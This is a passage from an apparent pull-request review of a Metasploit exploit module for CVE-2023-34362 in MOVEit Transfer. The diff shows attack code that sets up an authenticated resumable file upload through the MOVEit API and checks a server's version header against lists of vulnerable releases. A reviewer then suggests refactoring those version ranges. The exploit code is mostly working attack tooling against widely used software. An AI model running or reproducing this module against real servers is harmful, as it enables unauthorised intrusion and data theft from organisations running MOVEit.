modules/exploits/windows/http/moveit_cve_2023_34362.rb

```diff
@@ -0,0 +1,471 @@
+        Msf::OptString.new('PASSWORD', [ true, 'Password', Rex::Text.rand_text_alphanumeric(5..11)])
+
+      ]
+    )
+    @moveit_token = nil
+    @moveit_instid = nil
+    @cookies = nil
+    @guest_email_addr = "#{Rex::Text.rand_text_alphanumeric(5..12)}@#{Rex::Text.rand_text_alphanumeric(3..6)}.com"
+    @uploadfile_name = Rex::Text.rand_text_alphanumeric(8..15)
+    @uploadfile_size = rand(5..64)
+    @uploadfile_data = Rex::Text.rand_text_alphanumeric(@uploadfile_size)
+  end
+
+  def begin_file_upload(folders_json, token_json)
+    boundary = rand_text_numeric(27)
+    data = "--#{boundary}\r\n"
+    data << 'Content-Disposition: form-data;'
+    data << "name=\"name\"\r\n\r\n#{@uploadfile_name}\r\n--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"size\"\r\n\r\n#{@uploadfile_size}\r\n--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"comments\"\r\n\r\n\r\n--#{boundary}--\r\n"
+
+    res = send_request_raw({
+      'method' => 'POST',
+      'uri' => normalize_uri("/api/v1/folders/#{folders_json['items'][0]['id']}/files?uploadType=resumable"),
+      'headers' => {
+        'Content-Type' => 'multipart/form-data; boundary=' + boundary,
+        'Authorization' => "Bearer #{token_json['access_token']}"
+      },
+      'connection' => 'close',
+      'accept' => '*/*',
+      'data' => data
+    })
+
+    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't post API files #1 (#{files_response.body})") if res.code != 200
+
+    files_json = JSON.parse(res.body)
+    vprint_status("Initiated resumable file upload for fileId '#{files_json['fileId']}'...")
+    files_json
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri('moveitisapi/moveitisapi.dll?action=capa'),
+      'connection' => 'close',
+      'accept' => '*/*'
+    })
+    version = nil
+    if res && res.code == 200 && res.headers.key?('X-MOVEitISAPI-Version')
+      version = Rex::Version.new(res.headers['X-MOVEitISAPI-Version'])
+      # 2020.1.x AKA 12.1.x
+      return Exploit::CheckCode::Appears if version >= Rex::Version.new('12.1.0') && version < Rex::Version.new('12.1.10')
+      # 2021.0.x AKA 13.0.x
+      return Exploit::CheckCode::Appears if version >= Rex::Version.new('13.0.0') && version < Rex::Version.new('13.0.8')
+      # 2021.1.x AKA 13.1.x
+      return Exploit::CheckCode::Appears if version >= Rex::Version.new('13.1.0') && version < Rex::Version.new('13.1.6')
+      # 2022.0.x AKA 14.0.x
+      return Exploit::CheckCode::Appears if version >= Rex::Version.new('14.0.0') && version < Rex::Version.new('14.0.6')
+      # 2022.1.x AKA 14.1.x
+      return Exploit::CheckCode::Appears if version >= Rex::Version.new('14.1.0') && version < Rex::Version.new('14.1.7')
+      # 2023.0.x AKA 15.0.x
+      return Exploit::CheckCode::Appears if version >= Rex::Version.new('15.0.0') && version < Rex::Version.new('15.0.3')
```

Comment:
Consider, I think is maintains the readability and consolidates the version list:
```suggestion
      vulnerable_versions = [
         [ '12.1.0' , '12.1.10' ], # 2020.1.x AKA 12.1.x
         [ '13.0.0' , '13.0.8' ], # 2021.0.x AKA 13.0.x
         [ '13.1.0' , '13.1.6' ], # 2021.1.x AKA 13.1.x
         [ '14.0.0' , '14.0.6' ], # 2022.0.x AKA 14.0.x
         [ '14.1.0' , '14.1.7' ], # 2022.1.x AKA 14.1.x
         [ '15.0.0' , '15.0.3' ], # 2023.0.x AKA 15.0.x
      ]
      vulnerable_versions.each do |check_range|
        lower, upper = check_range
        return Exploit::CheckCode::Appears if version >= Rex::Version.new(lower) && version < Rex::Version.new(upper)
      end
```

Reply:
Not a blocker just an idea.